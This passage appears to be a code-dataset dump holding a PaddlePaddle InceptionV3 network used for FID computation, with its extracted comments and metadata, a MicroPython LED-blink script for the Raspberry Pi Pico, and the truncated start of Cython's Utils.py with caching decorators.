        self.branch7x7dbl_5 = ConvBNLayer(c7, 192, (1, 7), padding=(0, 3), name=name + '.branch7x7dbl_5')
        self.branch_pool0 = AvgPool2D(kernel_size=3, stride=1, padding=1, exclusive=True)
        self.branch_pool = ConvBNLayer(in_channels, 192, 1, name=name + '.branch_pool')

    def forward(self, x):
        out_1x1 = self.branch1x1(x)
        out_7x7 = self.branch7x7_3(self.branch7x7_2(self.branch7x7_1(x)))
        out_7x7dbl = self.branch7x7dbl_1(x)
        for layer in (self.branch7x7dbl_2, self.branch7x7dbl_3,
                      self.branch7x7dbl_4, self.branch7x7dbl_5):
            out_7x7dbl = layer(out_7x7dbl)
        out_pool = self.branch_pool(self.branch_pool0(x))
        return paddle.concat([out_1x1, out_7x7, out_7x7dbl, out_pool], axis=1)
class Fid_inceptionE_1(nn.Layer):
    """FID variant of the Inception-E block with an (exclusive) average-pool branch."""

    def __init__(self, in_channels, name=None):
        super(Fid_inceptionE_1, self).__init__()
        self.branch1x1 = ConvBNLayer(in_channels, 320, 1, name=name + '.branch1x1')
        self.branch3x3_1 = ConvBNLayer(in_channels, 384, 1, name=name + '.branch3x3_1')
        self.branch3x3_2a = ConvBNLayer(384, 384, (1, 3), padding=(0, 1), name=name + '.branch3x3_2a')
        self.branch3x3_2b = ConvBNLayer(384, 384, (3, 1), padding=(1, 0), name=name + '.branch3x3_2b')
        self.branch3x3dbl_1 = ConvBNLayer(in_channels, 448, 1, name=name + '.branch3x3dbl_1')
        self.branch3x3dbl_2 = ConvBNLayer(448, 384, 3, padding=1, name=name + '.branch3x3dbl_2')
        self.branch3x3dbl_3a = ConvBNLayer(384, 384, (1, 3), padding=(0, 1), name=name + '.branch3x3dbl_3a')
        self.branch3x3dbl_3b = ConvBNLayer(384, 384, (3, 1), padding=(1, 0), name=name + '.branch3x3dbl_3b')
        self.branch_pool0 = AvgPool2D(kernel_size=3, stride=1, padding=1, exclusive=True)
        self.branch_pool = ConvBNLayer(in_channels, 192, 1, name=name + '.branch_pool')

    def forward(self, x):
        out_1x1 = self.branch1x1(x)
        stem_3x3 = self.branch3x3_1(x)
        out_3x3 = paddle.concat([self.branch3x3_2a(stem_3x3),
                                 self.branch3x3_2b(stem_3x3)], axis=1)
        stem_dbl = self.branch3x3dbl_2(self.branch3x3dbl_1(x))
        out_3x3dbl = paddle.concat([self.branch3x3dbl_3a(stem_dbl),
                                    self.branch3x3dbl_3b(stem_dbl)], axis=1)
        out_pool = self.branch_pool(self.branch_pool0(x))
        return paddle.concat([out_1x1, out_3x3, out_3x3dbl, out_pool], axis=1)
class Fid_inceptionE_2(nn.Layer):
    """FID variant of the Inception-E block whose pool branch uses max-pooling."""

    def __init__(self, in_channels, name=None):
        super(Fid_inceptionE_2, self).__init__()
        self.branch1x1 = ConvBNLayer(in_channels, 320, 1, name=name + '.branch1x1')
        self.branch3x3_1 = ConvBNLayer(in_channels, 384, 1, name=name + '.branch3x3_1')
        self.branch3x3_2a = ConvBNLayer(384, 384, (1, 3), padding=(0, 1), name=name + '.branch3x3_2a')
        self.branch3x3_2b = ConvBNLayer(384, 384, (3, 1), padding=(1, 0), name=name + '.branch3x3_2b')
        self.branch3x3dbl_1 = ConvBNLayer(in_channels, 448, 1, name=name + '.branch3x3dbl_1')
        self.branch3x3dbl_2 = ConvBNLayer(448, 384, 3, padding=1, name=name + '.branch3x3dbl_2')
        self.branch3x3dbl_3a = ConvBNLayer(384, 384, (1, 3), padding=(0, 1), name=name + '.branch3x3dbl_3a')
        self.branch3x3dbl_3b = ConvBNLayer(384, 384, (3, 1), padding=(1, 0), name=name + '.branch3x3dbl_3b')
        # Max-pool (not average) in this branch; the original comment says
        # this matches the paper's reference implementation.
        self.branch_pool0 = MaxPool2D(kernel_size=3, stride=1, padding=1)
        self.branch_pool = ConvBNLayer(in_channels, 192, 1, name=name + '.branch_pool')

    def forward(self, x):
        out_1x1 = self.branch1x1(x)
        stem_3x3 = self.branch3x3_1(x)
        out_3x3 = paddle.concat([self.branch3x3_2a(stem_3x3),
                                 self.branch3x3_2b(stem_3x3)], axis=1)
        stem_dbl = self.branch3x3dbl_2(self.branch3x3dbl_1(x))
        out_3x3dbl = paddle.concat([self.branch3x3dbl_3a(stem_dbl),
                                    self.branch3x3dbl_3b(stem_dbl)], axis=1)
        out_pool = self.branch_pool(self.branch_pool0(x))
        return paddle.concat([out_1x1, out_3x3, out_3x3dbl, out_pool], axis=1)
class ConvBNLayer(nn.Layer):
    """Conv2D followed by BatchNorm (with optional activation).

    The ``name`` argument is mandatory in practice (``name + "..."`` would
    raise on ``None``): it builds explicit parameter names
    (``<name>.conv.weight``, ``<name>.bn.weight``, ...) so that pretrained
    inception-v3 checkpoints can be loaded by parameter name.
    """
    def __init__(self,
                 in_channels,
                 num_filters,
                 filter_size,
                 stride=1,
                 padding=0,
                 groups=1,
                 act='relu',
                 name=None):
        super(ConvBNLayer, self).__init__()
        # Convolution carries no bias; the BatchNorm bias takes its place.
        self.conv = Conv2D(in_channels=in_channels,
                           out_channels=num_filters,
                           kernel_size=filter_size,
                           stride=stride,
                           padding=padding,
                           groups=groups,
                           weight_attr=paddle.ParamAttr(name=name + ".conv.weight"),
                           bias_attr=False)
        # Activation is applied inside BatchNorm via its `act` argument.
        self.bn = BatchNorm(num_filters,
                            act=act,
                            epsilon=0.001,
                            param_attr=paddle.ParamAttr(name=name + ".bn.weight"),
                            bias_attr=paddle.ParamAttr(name=name + ".bn.bias"),
                            moving_mean_name=name + '.bn.running_mean',
                            moving_variance_name=name + '.bn.running_var')
    def forward(self, inputs):
        # conv -> batchnorm(+act)
        y = self.conv(inputs)
        y = self.bn(y)
        return y
|
#Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import math
import paddle
import paddle.nn as nn
from paddle.nn import Conv2D, AvgPool2D, MaxPool2D, BatchNorm, Linear, AdaptiveAvgPool2D
__all__ = ['InceptionV3']
class InceptionV3(nn.Layer):
DEFAULT_BLOCK_INDEX = 3
BLOCK_INDEX_BY_DIM = {
64: 0, # First max pooling features
192: 1, # Second max pooling featurs
768: 2, # Pre-aux classifier features
2048: 3 # Final average pooling features
}
def __init__(self,
output_blocks=[DEFAULT_BLOCK_INDEX],
class_dim=1000,
aux_logits=False,
resize_input=True,
normalize_input=True):
super(InceptionV3, self).__init__()
self.resize_input = resize_input
self.normalize_input = normalize_input
self.output_blocks = sorted(output_blocks)
self.last_needed_block = max(output_blocks)
self.class_dim = class_dim
self.aux_logits = aux_logits
assert self.last_needed_block <= 3, 'Last possible output block index is 3'
self.blocks = []
self.Conv2d_1a_3x3 = ConvBNLayer(3,
32,
3,
stride=2,
name='Conv2d_1a_3x3')
self.Conv2d_2a_3x3 = ConvBNLayer(32, 32, 3, name='Conv2d_2a_3x3')
self.Conv2d_2b_3x3 = ConvBNLayer(32,
64,
3,
padding=1,
name='Conv2d_2b_3x3')
self.maxpool1 = MaxPool2D(kernel_size=3, stride=2)
block0 = [
self.Conv2d_1a_3x3, self.Conv2d_2a_3x3, self.Conv2d_2b_3x3,
self.maxpool1
]
self.blocks.append(nn.Sequential(*block0))
### block1
if self.last_needed_block >= 1:
self.Conv2d_3b_1x1 = ConvBNLayer(64, 80, 1, name='Conv2d_3b_1x1')
self.Conv2d_4a_3x3 = ConvBNLayer(80, 192, 3, name='Conv2d_4a_3x3')
self.maxpool2 = MaxPool2D(kernel_size=3, stride=2)
block1 = [self.Conv2d_3b_1x1, self.Conv2d_4a_3x3, self.maxpool2]
self.blocks.append(nn.Sequential(*block1))
### block2
### Mixed_5b 5c 5d
if self.last_needed_block >= 2:
self.Mixed_5b = Fid_inceptionA(192,
pool_features=32,
name='Mixed_5b')
self.Mixed_5c = Fid_inceptionA(256,
pool_features=64,
name='Mixed_5c')
self.Mixed_5d = Fid_inceptionA(288,
pool_features=64,
name='Mixed_5d')
### Mixed_6
self.Mixed_6a = InceptionB(288, name='Mixed_6a')
self.Mixed_6b = Fid_inceptionC(768, c7=128, name='Mixed_6b')
self.Mixed_6c = Fid_inceptionC(768, c7=160, name='Mixed_6c')
self.Mixed_6d = Fid_inceptionC(768, c7=160, name='Mixed_6d')
self.Mixed_6e = Fid_inceptionC(768, c7=192, name='Mixed_6e')
block2 = [
self.Mixed_5b, self.Mixed_5c, self.Mixed_5d, self.Mixed_6a,
self.Mixed_6b, self.Mixed_6c, self.Mixed_6d, self.Mixed_6e
]
self.blocks.append(nn.Sequential(*block2))
if self.aux_logits:
self.AuxLogits = InceptionAux(768, self.class_dim, name='AuxLogits')
### block3
### Mixed_7
if self.last_needed_block >= 3:
self.Mixed_7a = InceptionD(768, name='Mixed_7a')
self.Mixed_7b = Fid_inceptionE_1(1280, name='Mixed_7b')
self.Mixed_7c = Fid_inceptionE_2(2048, name='Mixed_7c')
self.avgpool = AdaptiveAvgPool2D(output_size=1)
block3 = [self.Mixed_7a, self.Mixed_7b, self.Mixed_7c, self.avgpool]
self.blocks.append(nn.Sequential(*block3))
def forward(self, x):
out = []
aux = None
if self.resize_input:
x = nn.functional.interpolate(x,
size=[299, 299],
mode='bilinear',
align_corners=False,
align_mode=0)
if self.normalize_input:
x = x * 2 - 1
for idx, block in enumerate(self.blocks):
x = block(x)
if self.aux_logits and (idx == 2):
aux = self.AuxLogits(x)
if idx in self.output_blocks:
out.append(x)
if idx == self.last_needed_block:
break
return out, aux
class InceptionA(nn.Layer):
def __init__(self, in_channels, pool_features, name=None):
super(InceptionA, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch1x1')
self.branch5x5_1 = ConvBNLayer(in_channels,
48,
1,
name=name + '.branch5x5_1')
self.branch5x5_2 = ConvBNLayer(48,
64,
5,
padding=2,
name=name + '.branch5x5_2')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(64,
96,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3 = ConvBNLayer(96,
96,
3,
padding=1,
name=name + '.branch3x3dbl_3')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
pool_features,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch5x5, branch3x3dbl, branch_pool], axis=1)
class InceptionB(nn.Layer):
    """Inception-v3 reduction block: three parallel stride-2 branches.

    All branches halve the spatial size (stride-2 conv or stride-2 pool);
    their outputs are concatenated along axis 1.
    """
    def __init__(self, in_channels, name=None):
        super(InceptionB, self).__init__()
        # Branch 1: single 3x3 stride-2 conv.
        self.branch3x3 = ConvBNLayer(in_channels,
                                     384,
                                     3,
                                     stride=2,
                                     name=name + '.branch3x3')
        # Branch 2: 1x1 reduce -> 3x3 -> 3x3 stride-2.
        self.branch3x3dbl_1 = ConvBNLayer(in_channels,
                                          64,
                                          1,
                                          name=name + '.branch3x3dbl_1')
        self.branch3x3dbl_2 = ConvBNLayer(64,
                                          96,
                                          3,
                                          padding=1,
                                          name=name + '.branch3x3dbl_2')
        self.branch3x3dbl_3 = ConvBNLayer(96,
                                          96,
                                          3,
                                          stride=2,
                                          name=name + '.branch3x3dbl_3')
        # Branch 3: stride-2 max pool (no parameters).
        self.branch_pool = MaxPool2D(kernel_size=3, stride=2)
    def forward(self, x):
        branch3x3 = self.branch3x3(x)
        branch3x3dbl = self.branch3x3dbl_1(x)
        branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
        branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
        branch_pool = self.branch_pool(x)
        # Concatenate the three branches along axis 1.
        return paddle.concat([branch3x3, branch3x3dbl, branch_pool],
                             axis=1)
class InceptionC(nn.Layer):
def __init__(self, in_channels, c7, name=None):
super(InceptionC, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch1x1')
self.branch7x7_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7_1')
self.branch7x7_2 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7_2')
self.branch7x7_3 = ConvBNLayer(c7,
192, (7, 1),
padding=(3, 0),
name=name + '.branch7x7_3')
self.branch7x7dbl_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7dbl_1')
self.branch7x7dbl_2 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_2')
self.branch7x7dbl_3 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_3')
self.branch7x7dbl_4 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_4')
self.branch7x7dbl_5 = ConvBNLayer(c7,
192, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_5')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch7x7, branch7x7dbl, branch_pool], axis=1)
class InceptionD(nn.Layer):
    """Inception-v3 reduction block (the 'Mixed_7a' stage).

    Three parallel branches, each ending in a stride-2 operation, are
    concatenated along axis 1.
    """
    def __init__(self, in_channels, name=None):
        super(InceptionD, self).__init__()
        # Branch 1: 1x1 reduce -> 3x3 stride-2.
        self.branch3x3_1 = ConvBNLayer(in_channels,
                                       192,
                                       1,
                                       name=name + '.branch3x3_1')
        self.branch3x3_2 = ConvBNLayer(192,
                                       320,
                                       3,
                                       stride=2,
                                       name=name + '.branch3x3_2')
        # Branch 2: 1x1 reduce -> factorized 7x7 (1x7 then 7x1) -> 3x3 stride-2.
        self.branch7x7x3_1 = ConvBNLayer(in_channels,
                                         192,
                                         1,
                                         name=name + '.branch7x7x3_1')
        self.branch7x7x3_2 = ConvBNLayer(192,
                                         192, (1, 7),
                                         padding=(0, 3),
                                         name=name + '.branch7x7x3_2')
        self.branch7x7x3_3 = ConvBNLayer(192,
                                         192, (7, 1),
                                         padding=(3, 0),
                                         name=name + '.branch7x7x3_3')
        self.branch7x7x3_4 = ConvBNLayer(192,
                                         192,
                                         3,
                                         stride=2,
                                         name=name + '.branch7x7x3_4')
        # Branch 3: stride-2 max pool (no parameters).
        self.branch_pool = MaxPool2D(kernel_size=3, stride=2)
    def forward(self, x):
        branch3x3 = self.branch3x3_1(x)
        branch3x3 = self.branch3x3_2(branch3x3)
        branch7x7x3 = self.branch7x7x3_1(x)
        branch7x7x3 = self.branch7x7x3_2(branch7x7x3)
        branch7x7x3 = self.branch7x7x3_3(branch7x7x3)
        branch7x7x3 = self.branch7x7x3_4(branch7x7x3)
        branch_pool = self.branch_pool(x)
        return paddle.concat([branch3x3, branch7x7x3, branch_pool],
                             axis=1)
class InceptionE(nn.Layer):
def __init__(self, in_channels, name=None):
super(InceptionE, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
320,
1,
name=name + '.branch1x1')
self.branch3x3_1 = ConvBNLayer(in_channels,
384,
1,
name=name + '.branch3x3_1')
self.branch3x3_2a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3_2a')
self.branch3x3_2b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3_2b')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
448,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(448,
384,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3dbl_3a')
self.branch3x3dbl_3b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3dbl_3b')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3_1 = self.branch3x3_1(x)
branch3x3_2a = self.branch3x3_2a(branch3x3_1)
branch3x3_2b = self.branch3x3_2b(branch3x3_1)
branch3x3 = paddle.concat([branch3x3_2a, branch3x3_2b], axis=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl_3a = self.branch3x3dbl_3a(branch3x3dbl)
branch3x3dbl_3b = self.branch3x3dbl_3b(branch3x3dbl)
branch3x3dbl = paddle.concat([branch3x3dbl_3a, branch3x3dbl_3b],
axis=1)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1)
class InceptionAux(nn.Layer):
    """Auxiliary classifier head of inception v3.

    Only used when ``InceptionV3`` is built with ``aux_logits=True``
    (default is False, so this path is normally dead).
    """
    def __init__(self, in_channels, num_classes, name=None):
        super(InceptionAux, self).__init__()
        self.num_classes = num_classes
        self.pool0 = AvgPool2D(kernel_size=5, stride=3)
        self.conv0 = ConvBNLayer(in_channels, 128, 1, name=name + '.conv0')
        self.conv1 = ConvBNLayer(128, 768, 5, name=name + '.conv1')
        # NOTE(review): paddle 2.x AvgPool2D has no `global_pooling`
        # argument and requires `kernel_size` — this looks like a
        # fluid-1.x leftover; verify against the installed paddle version.
        self.pool1 = AvgPool2D(global_pooling=True)
    def forward(self, x):
        x = self.pool0(x)
        x = self.conv0(x)
        x = self.conv1(x)
        x = self.pool1(x)
        # NOTE(review): paddle 2.x flatten uses `start_axis`, not `axis`
        # — confirm this kwarg is accepted, otherwise this raises.
        x = paddle.flatten(x, axis=1)
        # NOTE(review): paddle.static.nn.fc is a static-graph API being
        # called from a dygraph Layer, and it creates fresh (untrained)
        # parameters each call — verify this head is actually exercised.
        x = paddle.static.nn.fc(x, size=self.num_classes)
        return x
class Fid_inceptionA(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, pool_features, name=None):
super(Fid_inceptionA, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch1x1')
self.branch5x5_1 = ConvBNLayer(in_channels,
48,
1,
name=name + '.branch5x5_1')
self.branch5x5_2 = ConvBNLayer(48,
64,
5,
padding=2,
name=name + '.branch5x5_2')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(64,
96,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3 = ConvBNLayer(96,
96,
3,
padding=1,
name=name + '.branch3x3dbl_3')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
pool_features,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch5x5, branch3x3dbl, branch_pool], axis=1)
class Fid_inceptionC(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, c7, name=None):
super(Fid_inceptionC, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch1x1')
self.branch7x7_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7_1')
self.branch7x7_2 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7_2')
self.branch7x7_3 = ConvBNLayer(c7,
192, (7, 1),
padding=(3, 0),
name=name + '.branch7x7_3')
self.branch7x7dbl_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7dbl_1')
self.branch7x7dbl_2 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_2')
self.branch7x7dbl_3 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_3')
self.branch7x7dbl_4 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_4')
self.branch7x7dbl_5 = ConvBNLayer(c7,
192, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_5')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch7x7, branch7x7dbl, branch_pool], axis=1)
class Fid_inceptionE_1(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, name=None):
super(Fid_inceptionE_1, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
320,
1,
name=name + '.branch1x1')
self.branch3x3_1 = ConvBNLayer(in_channels,
384,
1,
name=name + '.branch3x3_1')
self.branch3x3_2a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3_2a')
self.branch3x3_2b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3_2b')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
448,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(448,
384,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3dbl_3a')
self.branch3x3dbl_3b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3dbl_3b')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3_1 = self.branch3x3_1(x)
branch3x3_2a = self.branch3x3_2a(branch3x3_1)
branch3x3_2b = self.branch3x3_2b(branch3x3_1)
branch3x3 = paddle.concat([branch3x3_2a, branch3x3_2b], axis=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl_3a = self.branch3x3dbl_3a(branch3x3dbl)
branch3x3dbl_3b = self.branch3x3dbl_3b(branch3x3dbl)
branch3x3dbl = paddle.concat([branch3x3dbl_3a, branch3x3dbl_3b],
axis=1)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1)
class Fid_inceptionE_2(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, name=None):
super(Fid_inceptionE_2, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
320,
1,
name=name + '.branch1x1')
self.branch3x3_1 = ConvBNLayer(in_channels,
384,
1,
name=name + '.branch3x3_1')
self.branch3x3_2a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3_2a')
self.branch3x3_2b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3_2b')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
448,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(448,
384,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3dbl_3a')
self.branch3x3dbl_3b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3dbl_3b')
### same with paper
self.branch_pool0 = MaxPool2D(kernel_size=3,
stride=1,
padding=1)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3_1 = self.branch3x3_1(x)
branch3x3_2a = self.branch3x3_2a(branch3x3_1)
branch3x3_2b = self.branch3x3_2b(branch3x3_1)
branch3x3 = paddle.concat([branch3x3_2a, branch3x3_2b], axis=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl_3a = self.branch3x3dbl_3a(branch3x3dbl)
branch3x3dbl_3b = self.branch3x3dbl_3b(branch3x3dbl)
branch3x3dbl = paddle.concat([branch3x3dbl_3a, branch3x3dbl_3b],
axis=1)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1)
class ConvBNLayer(nn.Layer):
def __init__(self,
in_channels,
num_filters,
filter_size,
stride=1,
padding=0,
groups=1,
act='relu',
name=None):
super(ConvBNLayer, self).__init__()
self.conv = Conv2D(in_channels=in_channels,
out_channels=num_filters,
kernel_size=filter_size,
stride=stride,
padding=padding,
groups=groups,
weight_attr=paddle.ParamAttr(name=name + ".conv.weight"),
bias_attr=False)
self.bn = BatchNorm(num_filters,
act=act,
epsilon=0.001,
param_attr=paddle.ParamAttr(name=name + ".bn.weight"),
bias_attr=paddle.ParamAttr(name=name + ".bn.bias"),
moving_mean_name=name + '.bn.running_mean',
moving_variance_name=name + '.bn.running_var')
def forward(self, inputs):
y = self.conv(inputs)
y = self.bn(y)
return y
|
en
| 0.794403
|
#Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. # #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. # First max pooling features # Second max pooling featurs # Pre-aux classifier features # Final average pooling features ### block1 ### block2 ### Mixed_5b 5c 5d ### Mixed_6 ### block3 ### Mixed_7 FID block in inception v3 FID block in inception v3 FID block in inception v3 FID block in inception v3 ### same with paper
| 2.263951
| 2
|
on_board_led/main.py
|
ushiboy/picopico
| 0
|
6628127
|
# Blink the on-board LED of a Raspberry Pi Pico: toggle GPIO 25 once per
# second, forever (1 s on / 1 s off).
import time
from machine import Pin
led = Pin(25, Pin.OUT)  # on-board LED is wired to GPIO 25
while True:
    led.toggle()   # invert the current LED state
    time.sleep(1)  # seconds
|
import time
from machine import Pin
led = Pin(25, Pin.OUT)
while True:
led.toggle()
time.sleep(1)
|
none
| 1
| 2.819053
| 3
|
|
contrib/tools/cython/Cython/Utils.py
|
SitdikovRustam/CatBoost
| 1
|
6628128
|
#
# Cython -- Things that don't belong
# anywhere else in particular
#
from __future__ import absolute_import
try:
from __builtin__ import basestring
except ImportError:
basestring = str
import os
import sys
import re
import io
import codecs
from contextlib import contextmanager
modification_time = os.path.getmtime
def cached_function(f):
    """Memoising decorator: caches results of *f* keyed by positional args.

    A distinct sentinel object distinguishes "never computed" from a
    cached result of ``None``. The undecorated function stays reachable
    as ``wrapper.uncached``.
    """
    _missing = object()
    _results = {}
    def wrapper(*args):
        value = _results.get(args, _missing)
        if value is _missing:
            value = f(*args)
            _results[args] = value
        return value
    wrapper.uncached = f
    return wrapper
def cached_method(f):
    """Per-instance memoising decorator for methods.

    Results are stored on the instance itself in a ``__<name>_cache``
    dict keyed by the positional arguments, so every instance keeps its
    own independent cache.
    """
    attr_name = '__%s_cache' % f.__name__
    def wrapper(self, *args):
        store = getattr(self, attr_name, None)
        if store is None:
            store = {}
            setattr(self, attr_name, store)
        try:
            return store[args]
        except KeyError:
